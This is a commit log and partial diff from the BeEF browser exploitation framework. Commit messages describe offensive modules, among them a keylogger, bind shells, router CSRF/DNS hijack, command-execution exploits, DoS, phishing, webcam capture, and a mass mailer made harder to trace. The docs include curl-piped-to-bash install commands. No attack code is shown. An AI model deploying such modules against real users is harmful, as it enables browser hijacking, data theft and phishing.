32b48e5172 Add some client-side debugging to browser.js 
Perform minor code formatting changes
 2013-07-04 23:50:34 +09:30
bcoles
b16d7e3563 Add fake_notification_ff module 
Rename fake_notification module to fake_notification_ie
 2013-07-04 23:12:01 +09:30
Christian Frichot
7e73c0a532 Merge remote-tracking branch 'origin/master' 2013-07-04 20:14:29 +08:00
bcoles
1bddb00ec8 Add Replace Video (Fake Plugin) module 
Fix issue #695
 2013-07-04 11:54:52 +09:30
bcoles
9daacd799e Update version to beef-0.4.4.7 2013-07-04 08:20:05 +09:30
bcoles
4fe51dcd28 Update version to '0.4.4.6.1-alpha' bug fix edition 2013-07-04 08:17:17 +09:30
bcoles
af6cf9e5d4 Add Firefox 23 and 24 support for Firefox aurora/beta users 
Firefox 23 ETA August 2013
Firefox 24 ETA September 2013
 2013-07-04 07:39:23 +09:30
BWZ
3705009982 LiveCD - updade bundles during beef update 
Fixes #918
 2013-07-02 18:19:41 +10:00
antisnatchor
7f1473ccbf Added detection for Firefox 22 (and improved detection of FF 21/22 with a new DOM object). 2013-07-01 17:32:00 +01:00
antisnatchor
f869d2924a Fixed an XSS discovered by Mario in the default keylogger. 2013-07-01 15:24:36 +01:00
Christian Frichot
0b1c753bd3 Merge remote-tracking branch 'origin/master' 2013-07-01 16:22:20 +08:00
gcatt
f6ebe9fac0 Revert "Add Unity Web Player detection" 
This reverts commit 696e3715fe.
 2013-07-01 10:11:20 +02:00
Christian Frichot
570a8266ed Merge remote-tracking branch 'origin/master' 2013-07-01 16:10:33 +08:00
gcatt
696e3715fe Add Unity Web Player detection 2013-07-01 10:07:47 +02:00
Christian Frichot
53536d9d86 Merge remote-tracking branch 'origin/master' 2013-07-01 07:04:42 +08:00
bcoles
e61b266921 update version 2013-07-01 00:42:47 +09:30
bmantra
8cf17b01a5 Merge pull request #916 from bmantra/master 
added option to use only LF in the bind shell module for use with Linux
 2013-06-28 11:43:27 -07:00
bmantra
164ff5bea6 added option for LF only, to use with Linux 2013-06-28 20:42:53 +02:00
Michele Orru
6c6a33db50 Merge pull request #915 from Nbblrr/master 
DNS Enumeration modules does not consider the user timeout parameter
 2013-06-28 05:48:54 -07:00
Nbblrr
e95c74b5e1 DNS Enumeration module does not consider the user timeout parameter 2013-06-28 14:33:33 +02:00
soh_cah_toa
d9f7af2721 Reference point for broken unit tests. 
NoMethodError and NameError are present.
 2013-06-22 03:32:42 -04:00
Michele Orru
c70fa80468 Merge pull request #911 from gcattani/910-HasUnity 
Add Unity Web Player detection
 2013-06-19 03:06:42 -07:00
gcatt
1be8ec12fd Add Unity Web Player detection 2013-06-18 23:59:43 +02:00
Christian Frichot
0dd499c71a Updated browser detection to capture Chrome under iOS. See Issue #909 2013-06-16 16:19:58 +08:00
Christian Frichot
dab58f0e61 Updated hardware constants better detects and displays pure Nexus phones. Issue #908 2013-06-16 14:49:39 +08:00
Christian Frichot
2e68470d23 Android OS Icon should now display. See Issue #907 2013-06-16 14:27:12 +08:00
Christian Frichot
473f349394 Missing apostrophe in PHP-5.3.9-dos module.rb. This was breaking Rake. Make sure you run rake peeps before pushing! 2013-06-15 13:48:05 +08:00
Christian Frichot
dbebf12d27 Update to browser_filter. See Issue #906 2013-06-15 13:45:24 +08:00
Christian Frichot
96f763b7e0 Chrome 27/28 detection. Fixes Issue #905 2013-06-15 13:41:41 +08:00
bcoles
d40486c391 Add airlive_ip_camera_csrf module 2013-06-14 15:28:35 +09:30
Brendan Coles
d43f443555 Merge pull request #904 from Nbblrr/master 
Add modules for detecting MS Office version and Bitdefender 2012

Fix issue #902
Fix issue #903
 2013-06-13 22:38:37 -07:00
Nbblrr
2b473bfda9 Add module which detect MS Office version. Closes #903 2013-06-14 00:39:39 +02:00
Nbblrr
a2b627c8ae Add module to detect bitdefender 2012. Closes #902 2013-06-14 00:07:00 +02:00
soh_cah_toa
d45bff3a59 Improved #check_dns_response to use config file for address/port. 2013-06-10 18:11:36 -04:00
soh_cah_toa
d2ac9e0f7a Included broken DNS unit tests so others can help debug. 
Temporary 'dns' and 'dns_rest' Rake tasks make it easier to run tests.
 2013-06-08 23:25:23 -04:00
soh_cah_toa
9e1ec69e40 Added tests for GET /api/dns/ruleset handler. 2013-06-08 22:44:51 -04:00
soh_cah_toa
e775748603 Added more tests for GET /api/dns/rule/:id with invalid input. 
Also changed handler to return 404 when rule isn't found.
 2013-06-08 21:58:28 -04:00
soh_cah_toa
3b58518cfd Added tests for GET /api/dns/rule/:id handler. 
Fixed #parse_response so that these tests pass.
 2013-06-08 19:04:42 -04:00
soh_cah_toa
b9d64f0b89 Significantly refactored code in #test_3_add_rule_types. 2013-06-07 23:56:19 -04:00
soh_cah_toa
e527f1ae09 Refactored redundant code in #test_1_add_rule_good. 2013-06-07 23:09:07 -04:00
soh_cah_toa
68e56fa8c0 Added tests for NS, PTR, SOA, TXT, WKS, and invalid RR types. 
All RR's are now tested. Though the tests are yet to be optimized.
 2013-06-07 23:03:10 -04:00
soh_cah_toa
eccbdd6958 Added tests for AAAA, CNAME, HINFO, MINFO, and MX RR types. 
Also fixed #format_response to properly format MS records.
 2013-06-07 18:32:29 -04:00
soh_cah_toa
019ec2f6ed Added new test for attempting to add an existing rule. 2013-06-07 00:05:15 -04:00
soh_cah_toa
cfa9177af1 Added 4 new tests for bad POST /api/dns/rule requests. 2013-06-06 23:58:12 -04:00
soh_cah_toa
1f37ceec9f Began first integration tests for DNS RESTful API interface. 
First test is for POST /api/dns/rule handler.
 2013-06-06 23:16:40 -04:00
soh_cah_toa
6901581ae7 Moved #format_response call to before when RR type is evaled. 
Since #format_response throws an exception for unknown RR types,
calling it first will ensure bad Resolv::DNS::Resource names will
never be evaled.
 2013-06-06 22:59:54 -04:00
soh_cah_toa
09ec09601e Changed hash key syntax from previous commit. 
Besides being consistent, Sinatra actually requires the string
syntax.
 2013-06-05 18:33:08 -04:00
soh_cah_toa
fc6f0aface Changed DELETE handler to return JSON "success" key. 
Prior to this, nothing was returned. This will allow users to
determine whether or not a rule was removed as expected.
 2013-06-05 18:29:18 -04:00
soh_cah_toa
89a5d6fdbb Modified #remove_rule to return a boolean value. 
This is will soon allow the DELETE handler to indicate success
or failure.
 2013-06-05 18:20:48 -04:00
soh_cah_toa
6c61b39d81 Changed 401 status to 403 in filter for non-permitted IP's. 
403 Forbidden is more appropriate since 401 Unauthorized only
indicates that authentication is needed. In the case of a bad IP,
authentication will make no difference which is exactly what 403 is
meant for.
 2013-06-05 17:09:09 -04:00
soh_cah_toa
80ab665054 Added new InvalidParamError class for handling bad named parameters. 
Previously, InvalidJsonError was being used mistakenly for this which
is misleading considering no JSON was involved.
 2013-06-05 16:56:05 -04:00
soh_cah_toa
e56494d486 Renamed /rules GET route to /ruleset for the sake of consistency. 
Also added new "count" key to result that lists the number of rules.
 2013-06-05 16:30:24 -04:00
soh_cah_toa
2f5133e11a Changed GET handlers to return recently fixed rule data. 
Also wrapped all handlers in a begin/end block that catches
internal StandardError exceptions.
 2013-06-05 15:56:33 -04:00
soh_cah_toa
fce4c9196d Modified grep test case to allow #eval use in DNS extension. 
Using #eval is necessary for normal functioning and is now used in
a safe manner.
 2013-06-03 21:53:06 -04:00
soh_cah_toa
0af4029915 Added placeholders necessary to start DNS unit tests. 
Currently does nothing but assert(true).
 2013-06-03 21:42:34 -04:00
soh_cah_toa
44622345d0 s/DNS/Dns/g since that is the BeEF style convention. 2013-06-03 17:55:58 -04:00
soh_cah_toa
0f8221918b Improved coding style (a la ruby-style-guide and rubocop). 
Because I'm too tired to start testing and need a little victory. ;)
 2013-06-03 00:11:41 -04:00
soh_cah_toa
c8c9e1e139 Reimplemented POST handler to avoid unsafe use of #eval. 
Now the desired response is passed an array. Each RR type is handled
specially to craft the necessary response.
 2013-06-02 22:40:58 -04:00
soh_cah_toa
998980b566 Fixed case-statement in #match that prevented adding rules locally. 2013-06-02 22:23:27 -04:00
bcoles
dbabb379fb Add Iceweasel detection in browser.js 2013-06-02 05:14:33 +09:30
bcoles
5252bea54a Add Get Form Values module 
This module retrieves the name, type, and value of all input
fields for all forms on the page.
 2013-06-02 05:11:45 +09:30
bcoles
7fdfcc3ef0 Add beef.browser.isA() to avant_steal_history module 
Part of issue #774
 2013-06-02 03:19:05 +09:30
bcoles
3c5b68e112 Add beef.browser.isA() to detect Avant Browser 
Fixes issue #774
 2013-06-02 03:14:29 +09:30
Michele Orru
9e17958268 Merge pull request #900 from james-otten/master 
Added Actiontec Q1000 router CSRF module
 2013-05-31 02:36:40 -07:00
James Otten
f2efa533c8 Added Actiontec Q1000 CSRF module 2013-05-30 15:49:47 -05:00
Christian Frichot
9636cb0972 Updated Gmail detection URL. Fixes #Issue 899 2013-05-28 20:34:56 +08:00
bcoles
1dc59f7b01 Add D-Link ShareCenter command execution exploit module 2013-05-27 13:50:12 +09:30
soh_cah_toa
7f4562945a Added new InvalidJsonError class for handling errors in JSON input. 
This is better practice than just (ab)using StandardError.
 2013-05-26 23:46:37 -04:00
soh_cah_toa
38284d5eaa Implemented DELETE handler for removing DNS rules. 2013-05-26 23:26:58 -04:00
bcoles
ff620d42f4 Add belkin_dns_csrf DNS hijack module 
Part of issue #538
 2013-05-27 12:50:06 +09:30
bcoles
61e6337046 Remove zenoss_daemon_csrf module 2013-05-27 12:14:27 +09:30
soh_cah_toa
27b1b530ef Implemented POST handler for /api/dns/rule which adds a new rule. 
A host of other changes got roped into this as well. #match now
silently handles blocks passed as a String in order to handle
the 'block' JSON parameter. This is because sourcify doesn't
work with eval'd data.

Rule id's are no longer incremental integers. It's now a 7-character
"token" generated from #secure_token and is managed by the RubyDNS
module.
 2013-05-26 22:44:11 -04:00
bcoles
639d0611a6 Add command_id to embedded iframe/img IDs for router exploits 
This prevents a race condition where duplicate iframes/imgs are
created if a module is run twice simultaneously. The second iframe/img
was not being removed during `cleanup()`.
 2013-05-27 11:56:01 +09:30
bcoles
ab7a62e8a4 Update version 2013-05-27 10:40:58 +09:30
Michele Orru
71f04d82f5 Merge pull request #849 from geefunkmasterpro/master 
Enhancements to Mass Mailer
 2013-05-26 04:58:57 -07:00
bcoles
704b979054 minor syntax changes to php-5.3.9-dos module 2013-05-26 02:48:04 +09:30
bcoles
7aaafc79aa Remove bi-directional communication from IPEC win bindshell module 2013-05-26 02:41:04 +09:30
bcoles
f90ad4a261 Add detection for WebRTC support 2013-05-24 17:06:36 +09:30
bcoles
0dfab0e348 Add EXTRAnet Collaboration Tool Command Execution exploit module 2013-05-24 16:40:02 +09:30
bcoles
018a849e14 Add 'path' argument for beef.dom.createIframeIpecForm() 2013-05-24 14:01:21 +09:30
bcoles
717f63ff0c Add ruby-nntpd Command Execution exploit module 2013-05-24 13:50:04 +09:30
bcoles
9bac6b4fc1 Add support for Firefox 21 2013-05-24 13:47:31 +09:30
bcoles
2dae1d4c07 Add /bin/sh -c to default command 2013-05-22 14:37:01 +09:30
bcoles
7de48ceafb Add GroovyShell Server Command Execution IPEC exploit module 2013-05-22 02:32:27 +09:30
soh_cah_toa
c6f38324d1 Refactored #get_ruleset to be part of RubyDNS. 
All database logic should be inside RubyDNS since BeEF's DNS class
is mostly just a wrapper around it.
 2013-05-18 21:00:22 -04:00
soh_cah_toa
054767c898 Added RESTful API route for /api/dns/rule/:id. 
This will return a single rule given its unique id.
 2013-05-17 23:02:40 -04:00
soh_cah_toa
702595c04c Improved a lot of documentation for BeEF::Extension::DNS::DNS. 2013-05-17 19:12:05 -04:00
soh_cah_toa
c70037f9f4 Began adding support for RESTful API beginning with /api/dns/rules. 2013-05-17 18:25:22 -04:00
soh_cah_toa
13001b9642 Updated README.mkd to mention rubydns and sourcify dependencies. 
This was forgettin in commit 872ce2e.
 2013-05-16 23:24:23 -04:00
soh_cah_toa
18a78b57b2 Fixed load_rules() to rebuild 'pattern' and 'type' as an array. 
This was forgotten in the previous commit.
 2013-05-16 23:20:04 -04:00
soh_cah_toa
24f7e5b6cd Separated 'pattern' and 'type' properties in DNS model. 
This will expose the resource type to the RESTful API (coming soon).
 2013-05-16 23:14:29 -04:00
soh_cah_toa
6d2a771084 Changed model name to BeEF::Core::Models::DNS::Rule. 
This is more descriptive and follows the singular name convention.
 2013-05-15 22:29:42 -04:00
soh_cah_toa
271b2b8e85 Removed RubyDNS::Server#rules attribute accessor since it's unused. 2013-05-15 22:19:58 -04:00
soh_cah_toa
35f25bbeb9 Removed load_rules() and parse_type() since they're unused. 2013-05-15 22:18:16 -04:00
soh_cah_toa
872ce2e92f Updated README to mention rubydns and sourcify dependencies. 2013-05-15 22:15:50 -04:00
soh_cah_toa
992e95f0d7 Added database support when adding/removing rules. 
Needed to add 'sourcify' as a dependency in order to store code blocks
in the database.
 2013-05-15 22:12:37 -04:00
soh_cah_toa
1f7e748afc Removed parse_response() since it's no longer needed. 2013-05-14 19:23:08 -04:00
soh_cah_toa
ddcb040c40 Marked add_rule() and remove_rule() as critical sections. 
Mutual exclusion is imperative here since other modules/extenions may
be simultaneously adding/removing rules, thus putting the value of
@next_id at risk of becoming inconsistent.
 2013-05-14 19:12:23 -04:00
soh_cah_toa
e563a8946b Began implementing new method of adding rules without periodic timer. 
Also added improved documentation for add_rule() and remove_rule().
 2013-05-14 18:47:51 -04:00
soh_cah_toa
86e01b1327 Documented run_server() and add_rule(). 2013-05-10 23:19:58 -04:00
soh_cah_toa
d622bf3e5e New DNS entries can now be added dynamically without a server restart. 
Database is checked every five seconds and adds new rules if there
were any changes.
 2013-05-10 23:01:10 -04:00
Brendan Coles
8ecdceb928 Merge pull request #894 from sgorbaty/master 
New functionality - detect phonegap plugins
 2013-05-09 01:59:49 -07:00
Sergey Gorbaty
498372aef3 Adding phonegap integration with keychain plugin 2013-05-08 13:18:31 -07:00
soh_cah_toa
c7eb1c7fc9 Added DNS database model to load resource records from. 
Now modules/extensions can dynamically add new RR's. However, changes
don't take effect until BeEF restarts (fix incoming).
 2013-05-08 00:03:08 -04:00
soh_cah_toa
d24a00a639 Overrode RubyDNS::Transaction.respond! to use debug logger instead. 
Now all RubyDNS output is properly disabled unless --verbose is given.
 2013-05-07 23:59:27 -04:00
soh_cah_toa
c7981f3c0d Demoted UPSTREAM from constant to local variable. Minimizes scope. 2013-05-07 22:40:26 -04:00
soh_cah_toa
281cde1cbb Added new definition for Logger#warn. 2013-05-07 22:06:13 -04:00
soh_cah_toa
493ed5182b Made BeEF::Extension::DNS::DNS into a singleton object. 
This ensures that all modules/extensions that add new RR's
refer to a single server instance.
 2013-05-07 21:56:11 -04:00
Sergey Gorbaty
55d8506960 Added primitive phonegap plugin detection 2013-05-07 17:10:12 -07:00
antisnatchor
8d60c10298 Merge branch 'master' of https://github.com/beefproject/beef 2013-05-07 13:04:19 +02:00
antisnatchor
94d15cd386 Added DOS module which allows you to send multiple GET or POST requests to a target, from a WebWorker in order to don't slow down the whole browser. 2013-05-07 13:00:34 +02:00
soh_cah_toa
ceb55ef3df Resolved DNS thread issue using EM::next_tick() instead of sleep(). 2013-05-06 13:09:44 -04:00
bcoles
5bbf26abac Add beef.http.dns_port config option 2013-05-06 16:03:17 +09:30
soh_cah_toa
cbd815c519 Changed output format for RubyDNS to be "BeEF-compliant". 
RubyDNS's logger now uses BeEF's print-related functions. Debug
messages regarding queries can be enabled using --verbose.
 2013-05-05 22:19:54 -04:00
soh_cah_toa
d22373d828 Fixed thread issue that occasionally caused BeEF to stop immediately. 
While using sleep() to fix thread complications is never a great
solution, it gets the job done for now.
 2013-05-05 21:14:30 -04:00
Brendan Coles
5b90c351da Merge pull request #888 from sgorbaty/master 
Adding new features to Phonegap module
 2013-05-05 17:26:31 -07:00
antisnatchor
b501fe7c1a Updated Rack dependency in Gemfile in order to don't create conflicts with the updated Sinatra dependency. 2013-05-04 09:42:40 +01:00
Michele Orru
b28e631500 Merge pull request #889 from 0x1a0ran/master 
Bug fix: cross-origin XHR with "Origin" or "Referrer" header set always return 403.
 2013-05-04 01:30:42 -07:00
soh_cah_toa
fdd1048f1a Implemented basic nameserver and configured it to run on BeEF startup. 
It's worth noting that RubyDNS currently displays a lot of messy
output. This needs to be addressed before moving any further.
 2013-05-03 22:37:42 -04:00
soh_cah_toa
cc4b34ed8d Started basic DNS extension. Currently does nothing. 2013-05-03 21:25:53 -04:00
soh_cah_toa
9f7d326f6f Added RubyDNS to Gemfile and core/loader.rb. 2013-05-03 17:34:41 -04:00
Sergey Gorbaty
5722cb2bc1 Added email to contact list 2013-05-03 14:24:23 -07:00
Sergey Gorbaty
0479744dfc added device model detection 2013-05-03 14:14:19 -07:00
Sergey Gorbaty
3dbfdbac7e Adding user prompt 2013-05-03 14:02:53 -07:00
Sergey Gorbaty
d3262d9451 Adding local detection 2013-05-03 13:34:09 -07:00
Sergey Gorbaty
906ca6ccce Cordova detection added 2013-05-03 13:13:24 -07:00
Xiaoran Wang
ea560c3464 Added configurable port for postsql and mysql 2013-05-03 13:01:37 -07:00
Xiaoran Wang
b79402ce5f updated sinatra from 1.3.2 to 1.4.2 to fix the CORS request always return a 403 bug. link here https://github.com/sinatra/sinatra/issues/518 2013-05-03 11:02:11 -07:00
Sergey Gorbaty
1699d52475 adding contact list 2013-05-03 10:09:09 -07:00
antisnatchor
c5d5b99472 Issue #886: The preflight OPTIONS request now allow also the content-type header, required to use a json conten-type with POST requests. 2013-05-02 10:55:16 +01:00
antisnatchor
9915547b19 Issue #886: Added support for preflight OPTIONS request. 2013-05-01 17:19:48 +01:00
antisnatchor
ef2eac26eb Issue #886: Added support for CORS on the Router object. The RESTful aPI can not be called from JS x-domain. 2013-05-01 11:15:21 +01:00
bcoles
09be2db069 Update version to beef-0.4.4.5 2013-05-01 17:53:21 +09:30
bcoles
6da4e2c39c Update version to '0.4.4.4.1-alpha' bug fix edition 2013-05-01 17:49:21 +09:30
bcoles
15c7e64e93 Fix bug with module image result rendering in admin UI 2013-05-01 17:47:00 +09:30
bcoles
91e2b36ce4 Update webcam module so the picture returned as a base64 encoded string 
will be rendered in the admin UI
 2013-05-01 16:44:28 +09:30
bcoles
b82696ead2 Enabled web server imitation by default 
The time has come. This feature has been stable for a while.
 2013-05-01 16:43:26 +09:30
bcoles
7233957664 Update version 2013-04-30 18:56:37 +09:30
bcoles
88678f986c Add 'Debug -> Test Return Image' module 
Part of isse #883
 2013-04-30 18:40:25 +09:30
bcoles
719bb4a20b Fixed malformed YAML in modules/browser/get_visited_domains/config.yaml 2013-04-25 01:37:15 +09:30
antisnatchor
4ea18852f6 Updated eventmachine gem version in Gemfile. 2013-04-21 10:52:46 +01:00
qswain2
c16479a14e Add chrome support to get_visited_domains 
Added chrme implementation based on visipisi
 2013-04-19 01:02:48 -04:00
bcoles
59951959f1 Add Opencart password reset CSRF module 
This module hasn't been tested against an Opencart instance
 2013-04-19 09:18:05 +09:30
bcoles
da763df110 Uncommented several instances of beef.debug() - Part of issue #862 2013-04-17 22:12:35 +09:30
bcoles
4980ca02a6 Add beef.client.debug config property - Part of issue #862 
Client-side debugging is disabled by default

`beef.debug()` now only shows messages if `beef.client.debug` is true
 2013-04-17 22:05:31 +09:30
Christian Frichot
6e0f7a266e Issue #883. Admin UI will inline display images from the HTML5 webcam module now 2013-04-15 19:28:52 +08:00
Christian Frichot
e3cb7f7a2d #882. New HTML5 WebRTC Webcam Module 2013-04-15 19:20:48 +08:00
Christian Frichot
6e9db43463 Fixes issue #881. Console fix for reviewing previous responses 2013-04-15 19:18:07 +08:00
bcoles
a172362452 Part of issue #862 - Add beef.debug() for client-side debugging 
Add `beef.debug()` function - wraps `console.log()`

Debug messages are suppressed for browsers which don't support `console.log()`

Update './core/*' to use `beef.debug()` instead of `console.log()`
Update './modules/*' to use `beef.debug()` instead of `console.log()`
Update './extensions/*' to use `beef.debug()` instead of `console.log()`

Add 'modules/debug/test_beef_debug/' module
 2013-04-15 16:49:01 +09:30
bcoles
55b0bee9ca Re-enable XSS-Rays vectors containing ' charater 
Fix issue #47
 2013-04-14 20:38:41 +09:30
Christian Frichot
950c3d37a7 Fixes Issue #880. Detect Tor update - now works 2013-04-13 14:51:34 +08:00
Christian Frichot
1721d3c263 Fixes issue #879. Console enhancements. 2013-04-13 14:48:40 +08:00
antisnatchor
5585879cca Updated multiple core files to use hook_session_name consistently from the config.yaml file. 2013-04-09 10:25:49 +01:00
Christian Frichot
d855100ac9 Fixes #878 and #758. 2013-04-08 21:52:50 +08:00
Christian Frichot
fad33dfea7 Fixes #877. New IE Fake Notification Bar Module 2013-04-08 19:36:02 +08:00
Christian Frichot
b4732a9438 Fixes #876. Can detect Chrome 26. 2013-04-08 13:08:56 +08:00
antisnatchor
73e291832e Replacing document.location.href with location in xssrays.js. 2013-04-07 15:54:14 +01:00
antisnatchor
85b204f52b Updated beef.hardware component name for consistency. 2013-04-07 13:19:23 +01:00
antisnatchor
78410e28eb Changed attachApplet dom.js method to use <applet> also for Firefox, instead of the <embed> tag. This fixes some issues when running Signed Applets. 2013-04-06 12:30:00 +01:00
antisnatchor
222cff3f1d Added a README file for the JavaPaylod signed applet exploit. 2013-04-06 12:29:05 +01:00
Christian Frichot
2ef1b5bab8 Updates gmail phishing command module. Fixes #873 2013-04-06 15:54:55 +08:00
Christian Frichot
af67c6a8d9 Few enhancements to dom.js. See #870 #871 #872 2013-04-06 15:52:32 +08:00
Christian Frichot
79572a61f0 Renamed webcam_permission_check module 2013-04-06 14:35:21 +08:00
Christian Frichot
2fcdf1038d xntriks updates to webcam_perm_check 2013-04-06 14:32:51 +08:00
Christian Frichot
cca21f1003 Merge pull request #869 from bw-z/master 
Added Webcam Permission Check Module - which I'll then update.
 2013-04-05 23:29:21 -07:00
Christian Frichot
07fe3a9c0e Updates to tabnabbing module to use jQuerys wider event handling. #868 2013-04-04 21:33:43 +08:00
Christian Frichot
69fd3e600c Event log now logs when a zombie comes back online. #867 2013-04-04 21:29:18 +08:00
Christian Frichot
ae98842ad4 Tiny fix to Clippy so it appears properly. #866 2013-04-04 19:37:08 +08:00
bcoles
159ecb5ade Fix malformed YAML in 'deface_web_page_component' module 2013-04-04 00:04:45 +10:30
BWZ
cf4ab9533e Added Webcam Permission Check Module 2013-04-03 09:01:15 +10:00
Christian Frichot
9a23ed758e New getHighestZindex function in beef.dom and updated createIframe beef.dom function. #865 2013-04-02 14:33:57 +08:00
Christian Frichot
389f27360d Slight spelling mistake fix up in the Welcome tab of the Admin UI 2013-04-01 19:51:16 +08:00
Christian Frichot
e8eda3ef99 Minor enhancements to the Admin UI. #864 2013-04-01 11:07:50 +08:00
Saafan
af8018500b Fixing some unit tests 2013-03-31 16:22:58 +02:00
Christian Frichot
22cd68101d Added Bookmarklet to the Welcome Tab in the Admin UI. #863 2013-03-30 17:31:36 +08:00
bcoles
760e7a456e Update version 2013-03-29 15:59:48 +10:30
geefunkmasterpro
66d0e3535b Added fromaddr to mass mailer JSON interface so emails can be sent from 
any address without restart.

Removed fromaddr entry from config.yaml.
 2013-02-27 23:29:08 +11:00
geefunkmasterpro
e79372f8ac Added auth field to config so that emails are harder to track to sender 
Added error handling to identify:
  - errors creating the mail headers
  - errors processing JSON input
  - errors in the mailer configuration
 2013-02-27 21:33:48 +11:00
marc
612343990d Merge branch 'master' of https://github.com/beefproject/beef 2012-08-30 11:33:26 +01:00
Marc Wickenden
c708a60bdd new it wasn't 2012-07-24 20:05:45 +01:00
Marc Wickenden
6ce3581ae5 add Gemfile.lock. I'm not sure this is a good idea 2012-07-24 19:51:03 +01:00
1050 changed files with 19352 additions and 2587 deletions
Expand all files Collapse all files

42
Gemfile
View File

@@ -1,39 +1,49 @@
# BeEF's Gemfile
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Gems only required on Windows, or with specific Windows issues
gem "eventmachine", "1.0.3"
gem "thin"
gem "sinatra", "1.4.2"
gem "rack", "1.5.2"
gem "em-websocket", "~> 0.3.6" # WebSocket support
gem "uglifier", "~> 2.2.1"
# Windows support
if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
# make sure you install this gem following https://github.com/hiranpeiris/therubyracer_for_windows
gem "therubyracer", "~> 0.11.0beta1"
gem "execjs"
gem "win32console"
gem "eventmachine", "1.0.0.beta.4.1"
else
gem "eventmachine", "0.12.10"
elsif !RUBY_PLATFORM.downcase.include?("darwin")
gem "therubyracer"
gem "execjs"
end
gem "thin"
gem "sinatra", "1.3.2"
gem "em-websocket", "~> 0.3.6"
gem "jsmin", "~> 1.0.1"
gem "ansi"
gem "term-ansicolor", :require => "term/ansicolor"
gem "dm-core"
gem "json"
gem "data_objects"
gem "dm-sqlite-adapter"
gem "dm-sqlite-adapter" # SQLite support
#gem dm-postgres-adapter # PostgreSQL support
#gem dm-mysql-adapter # MySQL support
gem "parseconfig"
gem "erubis"
gem "dm-migrations"
gem "msfrpc-client"
# notifications
gem "twitter"
gem "msfrpc-client" # Metasploit Integration extension
#gem "twitter", ">= 5.0.0" # Twitter Notifications extension
gem "rubyzip", ">= 1.0.0"
gem "rubydns" # DNS extension
gem "sourcify"
gem "geoip" # geolocation support
# For running unit tests
if ENV['BEEF_TEST']
# for running unit tests
gem "test-unit"
gem "test-unit-full"
gem "curb"
@@ -44,7 +54,7 @@ if ENV['BEEF_TEST']
# sudo apt-get install libxslt-dev libxml2-dev
# sudo port install libxml2 libxslt
gem "capybara"
#RESTful API tests/generic command module tests
# RESTful API tests/generic command module tests
gem "rest-client", "~> 1.6.7"
end

21
INSTALL.txt
View File

@@ -1,6 +1,6 @@
===============================================================================
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
@@ -26,11 +26,14 @@ Installation
2. Prerequisites (Windows)
!!! This must be done PRIOR to running the bundle install command !!!
Windows requires the sqlite.dll. Simply grab the zip file below and extract it to your Ruby bin directory:
http://www.sqlite.org/sqlitedll-3_7_0_1.zip
Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/hiranpeiris/therubyracer_for_windows.
3. Prerequisites (Linux)
@@ -39,9 +42,9 @@ Installation
On linux you will need to find the packages specific to your distribution for sqlite. An example for Ubuntu systems is:
3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
3.2. rvm install 1.9.2
3.3. rvm use 1.9.2
3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatible and conflicting ruby packages that are required
3.2. rvm install 1.9.3-p484
3.3. rvm use 1.9.3
4. Prerequisites (Mac OSX)
@@ -50,15 +53,15 @@ Installation
- Ruby 1.9
To install RVM and Ruby 1.9.3 on Mac OS:
$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
$ rvm install 1.9.3-p0 --with-gcc=clang
$ rvm install 1.9.3-p484
$ rvm use 1.9.3
5. Install instructions
Obtain application code either by downloading an archive from https://github.com/beefproject/beef/zipball/master or cloning the GIT repo git@github.com:beefproject/beef.git
Obtain application code either by downloading an archive from https://github.com/beefproject/beef/archive/master.zip or cloning the GIT repo https://github.com/beefproject/beef.git
Navigate to the ruby source directory and run:
Enter into the newly created BeEF directory, and type:
bundle install
@@ -68,4 +71,4 @@ Installation
Simply run:
./beef
./beef -x

26
README
View File

@@ -1,6 +1,6 @@
===============================================================================
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
@@ -35,24 +35,9 @@ Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [Ruby](http://rubylang.org) 1.9.2 or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
- dm-migrations
- msfrpc-client
- eventmachine
- win32console (Windows Only)
* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
Quick Start
@@ -60,7 +45,8 @@ Quick Start
__The following is for the impatient.__
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
$ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
@@ -68,7 +54,7 @@ For full installation details (including on Microsoft Windows), please refer to
Usage
-----
To get started, simply execute beef and follow the instrustions:
To get started, simply execute beef and follow the instructions:
$ ./beef

27
README.mkd
View File

@@ -1,6 +1,6 @@
===============================================================================
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
@@ -35,24 +35,9 @@ Requirements
------------
* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
* [Ruby](http://rubylang.org) 1.9.2 or higher
* [SQLite](http://sqlite.org) 3.x
* The following GEMS:
- bundler
- thin
- Sinatra
- ANSI
- TERM-ANSIcolor
- dm-core
- json
- data_objects
- dm-sqlite-adapter
- parseconfig
- erubis
